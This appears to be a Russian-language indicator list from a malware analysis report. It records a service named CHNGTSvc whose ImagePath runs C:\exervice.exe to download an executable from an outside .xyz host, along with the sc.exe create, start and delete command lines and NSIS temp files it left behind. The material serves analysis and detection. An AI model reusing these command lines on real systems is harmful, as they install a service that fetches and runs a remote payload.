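Техническая информация
Ниже перечислены наблюдаемые артефакты: запись реестра с параметром ImagePath службы CHNGTSvc, командные строки запущенных процессов и пути к файлам (заголовки разделов в этом фрагменте отсутствуют, поэтому из списка не видно, какие файлы создавались, а какие удалялись). В строках с символами «#» часть имени узла замаскирована; по длине и совпадающему окончанию это, по-видимому, тот же адрес, что приведён полностью в записи реестра.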
- [<HKLM>\SYSTEM\ControlSet001\Services\CHNGTSvc] 'ImagePath' = 'c:\exervice.exe http://cloudfront.e3ba815fc687db2682e1c56404cfb4df5f55def6.xyz/download/xpack1024_PL_PT_RO.1477323538.exe'
- '%TEMP%\nsp2.tmp\ns5.tmp' sc start CHNGTSvc
- '<SYSTEM32>\sc.exe' start CHNGTSvc
- 'C:\exervice.exe' http://cl########.####815fc687db2682e1c56404cfb4df5f55def6.xyz/download/xpack1024_PL_PT_RO.1477323538.exe
- '<SYSTEM32>\sc.exe' create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####815fc687db2682e1c56404cfb4df5f55def6.xyz/download/xpack1024_PL_PT_RO.1477323538.exe"
- '%TEMP%\nsp2.tmp\ns3.tmp' sc delete CHNGTSvc
- '<SYSTEM32>\sc.exe' delete CHNGTSvc
- '%TEMP%\nsp2.tmp\ns4.tmp' sc create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####815fc687db2682e1c56404cfb4df5f55def6.xyz/download/xpack1024_PL_PT_RO.1477323538.exe"
- %TEMP%\nsp2.tmp\ns4.tmp
- %TEMP%\nsp2.tmp\ns5.tmp
- %TEMP%\nsp2.tmp\ns3.tmp
- C:\exervice.exe
- %TEMP%\nsp2.tmp\nsExec.dll
- %TEMP%\nsp2.tmp\ns4.tmp
- %TEMP%\nsp2.tmp\ns3.tmp